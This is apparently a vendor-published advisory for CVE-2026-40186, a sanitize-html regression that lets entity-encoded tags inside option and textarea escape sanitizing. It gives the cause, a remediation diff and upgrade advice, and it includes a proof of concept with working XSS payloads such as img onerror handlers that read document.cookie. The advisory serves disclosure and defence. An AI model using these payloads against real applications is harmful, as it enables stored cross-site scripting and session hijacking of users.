Summary
Commit 49d0bb7 introduced a regression in sanitize-html that bypasses allowedTags enforcement for text inside nonTextTagsArray elements (textarea and option). Entity-encoded HTML inside these elements passes through the sanitizer as decoded, unescaped HTML, allowing injection of arbitrary tags including XSS payloads. This affects any application using sanitize-html that includes option or textarea in its allowedTags configuration.
Details
The vulnerable code is at packages/sanitize-html/index.js:569-573:
} else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) {
// htmlparser2 does not decode entities inside raw text elements like
// textarea and option. The text is already properly encoded, so pass
// it through without additional escaping to avoid double-encoding.
result += text;
}
The comment is factually incorrect. htmlparser2 10.x does decode HTML entities inside both <textarea> and <option> elements before passing text to the ontext callback. This can be verified:
const htmlparser2 = require('htmlparser2');
const parser = new htmlparser2.Parser({
ontext(text) { console.log(JSON.stringify(text)); }
});
parser.write('<option><script></option>');
// Outputs: "<", "script", ">" , entities are decoded
Because the code assumes the text is "already properly encoded" and skips escapeHtml(), the decoded entities (<, >) are written directly to the output as literal HTML characters. This completely bypasses the allowedTags filter, any tag can be injected inside an allowed option or textarea element using entity encoding.
The execution flow:
- Attacker submits:
<option><img src=x onerror=alert(1)></option> - htmlparser2 parses and decodes entities →
ontextreceives<img src=x onerror=alert(1)> - Code at line 569 checks: tag is
option, which is innonTextTagsArray→ true - Line 573:
result += text, writes decoded text directly without escaping - Output:
<option><img src=x onerror=alert(1)></option>,<img>tag injected despite not being inallowedTags
The script and style tags are handled separately at lines 563-568 (before the vulnerable block), so the effective vulnerability applies to textarea and option, plus any custom elements added to nonTextTags by the user.
Prior to commit 49d0bb7, text in these elements fell through to the escapeHtml branch (line 574-580), which correctly re-encoded the decoded entities.
PoC
Prerequisites: Application using sanitize-html 2.17.2 with option or textarea in allowedTags.
Step 1: Basic tag injection via option
const sanitize = require('sanitize-html');
const output = sanitize(
'<option><script>alert(1)</script></option>',
{ allowedTags: ['option'] }
);
console.log(output);
// Expected (safe): <option><script>alert(1)</script></option>
// Actual (vulnerable): <option><script>alert(1)</script></option>
Step 2: Element breakout with XSS event handler
const output2 = sanitize(
'<option></option><img src=x onerror=alert(document.cookie)></option>',
{ allowedTags: ['option'] }
);
console.log(output2);
// Output: <option></option><img src=x onerror=alert(document.cookie)></option>
// The <img> tag escapes the option context and executes the onerror handler
Step 3: Textarea breakout (also vulnerable)
const output3 = sanitize(
'<textarea></textarea><img src=x onerror=alert(1)></textarea>',
{ allowedTags: ['textarea'] }
);
console.log(output3);
// Output: <textarea></textarea><img src=x onerror=alert(1)></textarea>
Step 4: Full select/option context breakout
const output4 = sanitize(
'<select><option></option></select><img src=x onerror=alert(1)></option></select>',
{ allowedTags: ['select', 'option'] }
);
console.log(output4);
// Output: <select><option></option></select><img src=x onerror=alert(1)></option></select>
// Breaks out of both option and select elements
All outputs verified against sanitize-html 2.17.2 with htmlparser2 10.x.
Impact
- Complete
allowedTagsbypass: Any HTML tag can be injected through an allowedoptionortextareaelement using entity encoding, defeating the core security guarantee of sanitize-html. - Stored XSS: Applications that sanitize user-submitted HTML and allow
optionortextareatags (common in form builders, CMS platforms, rich text editors) are vulnerable to stored cross-site scripting. - Session hijacking: Attackers can inject event handlers (
onerror,onload, etc.) to steal session cookies or authentication tokens. - Scope: Affects non-default configurations only, the default
allowedTagsdoes not includeoptionortextarea. However, these tags are commonly allowed in applications that handle form-related HTML content.
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
CVE-2026-40186 has a CVSS score of 6.1 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.17.3); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Remove the vulnerable code block at lines 569-573 entirely. The escapeHtml branch (line 574) correctly handles these elements, htmlparser2 10.x decodes entities, and re-encoding with escapeHtml produces correct HTML output (entities are round-tripped, not double-encoded).
--- a/packages/sanitize-html/index.js
+++ b/packages/sanitize-html/index.js
@@ -566,11 +566,6 @@ function sanitizeHtml(html, options, _recursing) {
// your concern, don't allow them. The same is essentially true for style tags
// which have their own collection of XSS vectors.
result += text;
- } else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) {
- // htmlparser2 does not decode entities inside raw text elements like
- // textarea and option. The text is already properly encoded, so pass
- // it through without additional escaping to avoid double-encoding.
- result += text;
} else if (!addedText) {
const escaped = escapeHtml(text, false);
if (options.textFilter) {
This fix restores the pre-49d0bb7 behavior where all non-script/style text content goes through escapeHtml(), ensuring decoded entities are properly re-encoded before output.
Frequently Asked Questions
- What is CVE-2026-40186? CVE-2026-40186 is a medium-severity cross-site scripting (XSS) vulnerability in sanitize-html (npm), affecting versions >= 2.17.2, < 2.17.3. It is fixed in 2.17.3. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
- How severe is CVE-2026-40186? CVE-2026-40186 has a CVSS score of 6.1 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of sanitize-html are affected by CVE-2026-40186? sanitize-html (npm) versions >= 2.17.2, < 2.17.3 is affected.
- Is there a fix for CVE-2026-40186? Yes. CVE-2026-40186 is fixed in 2.17.3. Upgrade to this version or later.
- Is CVE-2026-40186 exploitable, and should I be worried? Whether CVE-2026-40186 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40186 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40186? Upgrade
sanitize-htmlto 2.17.3 or later.